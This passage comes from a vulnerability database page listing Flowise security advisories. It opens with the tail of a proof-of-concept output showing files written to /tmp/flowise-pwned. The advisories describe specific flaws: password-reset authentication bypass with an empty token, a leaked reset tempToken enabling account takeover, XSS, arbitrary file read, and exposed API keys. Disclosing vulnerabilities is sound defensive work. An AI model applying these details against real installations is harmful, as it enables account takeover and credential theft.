{"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]} $ ls -la /tmp/flowise-pwned/ total 16 drwxr-xr-x 4 user wheel 128 Jan 17 12:00 . drwxrwxrwt 12 root wheel 384 Jan 17 12:00 .. -rw-r--r-- 1 user wheel 1234 Jan 17 12:00 docstore.json -rw-r--r-- 1 user wheel 5678 Jan 17 12:00 faiss.index ``` |
Affected by 15 other vulnerabilities. |
|
VCID-w9yr-5jbp-q7fm
Aliases: CVE-2026-41276 GHSA-f6hc-c5jr-878p |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, this vulnerability allows remote attackers to bypass authentication on affected installations of FlowiseAI Flowise. Authentication is not required to exploit this vulnerability. The specific flaw exists within the resetPassword method of the AccountService class. There is no check performed to ensure that a password reset token has actually been generated for a user account. By default the value of the reset token stored in a users account is null, or an empty string if they've reset their password before. An attacker with knowledge of the user's email address can submit a request to the "/api/v1/account/reset-password" endpoint containing a null or empty string reset token value and reset that user's password to a value of their choosing. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-wg28-w8vn-ybb5
Aliases: CVE-2025-29192 GHSA-7r4h-vmj9-wg42 |
Flowise before 3.0.5 allows XSS via a FORM element and an INPUT element when an admin views the chat log. |
Affected by 66 other vulnerabilities. |
|
VCID-xt1d-efw7-g3c6
Aliases: CVE-2026-46443 GHSA-7g73-99r4-m4mj |
Affected by 0 other vulnerabilities. |
|
|
VCID-ynq7-cmm4-fuga
Aliases: CVE-2024-36422 GHSA-2jch-qc96-9f5g |
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `api/v1/chatflows/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available. |
Affected by 71 other vulnerabilities. |
|
VCID-ywgu-76cy-uqe7
Aliases: GHSA-x7rp-qj2h-ghgw |
Flowise Fails to Invalidate Existing Sessions After Password Changes |
Affected by 50 other vulnerabilities. |
|
VCID-z1y2-f2ws-8ycb
Aliases: CVE-2026-42862 GHSA-x5v6-pj28-cwwm |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to version 3.1.2, a mass assignment vulnerability exists in the tool update endpoint of FlowiseAI. The endpoint allows authenticated users to modify server-controlled properties such as workspaceId, createdDate, and updatedDate when updating a tool resource. Due to missing server-side validation and authorization checks, an attacker can manipulate the workspaceId field and reassign tools to arbitrary workspaces. This breaks tenant isolation in multi-workspace environments. This issue has been patched in version 3.1.2. |
Affected by 0 other vulnerabilities. |
|
VCID-zbrd-qdty-2bfs
Aliases: CVE-2025-58434 GHSA-wgpv-6j63-x5ph |
Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5 and earlier, the `forgot-password` endpoint in Flowise returns sensitive information including a valid password reset `tempToken` without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO). This vulnerability applies to both the cloud service (`cloud.flowiseai.com`) and self-hosted/local Flowise deployments that expose the same API. Commit 9e178d68873eb876073846433a596590d3d9c863 in version 3.0.6 secures password reset endpoints. Several recommended remediation steps are available. Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel. Ensure `forgot-password` responds with a generic success message regardless of input, to avoid user enumeration. Require strong validation of the `tempToken` (e.g., single-use, short expiry, tied to request origin, validated against email delivery). Apply the same fixes to both cloud and self-hosted/local deployments. Log and monitor password reset requests for suspicious activity. Consider multi-factor verification for sensitive accounts. |
Affected by 56 other vulnerabilities. |
|
VCID-zj8f-8p22-2uf1
Aliases: CVE-2024-36420 GHSA-h997-3fxj-p5j8 |
Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, the `/api/v1/openai-assistants-file` endpoint in `index.ts` is vulnerable to arbitrary file read due to lack of sanitization of the `fileName` body parameter. No known patches for this issue are available. |
Affected by 71 other vulnerabilities. |
|
VCID-zwna-stj5-3yhm
Aliases: CVE-2026-41278 GHSA-w47f-j8rh-wx87 |
Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, the GET /api/v1/public-chatflows/:id endpoint returns the full chatflow object without sanitization for public chatflows. Docker validation revealed this is worse than initially assessed: the sanitizeFlowDataForPublicEndpoint function does NOT exist in the released v3.0.13 Docker image. Both public-chatflows AND public-chatbotConfig return completely raw flowData including credential IDs, plaintext API keys, and password-type fields. This vulnerability is fixed in 3.1.0. |
Affected by 15 other vulnerabilities. |
|
VCID-zwz7-byj4-6qan
Aliases: GHSA-4fr9-3x69-36wv |
Flowise vulnerable to XSS |
Affected by 51 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||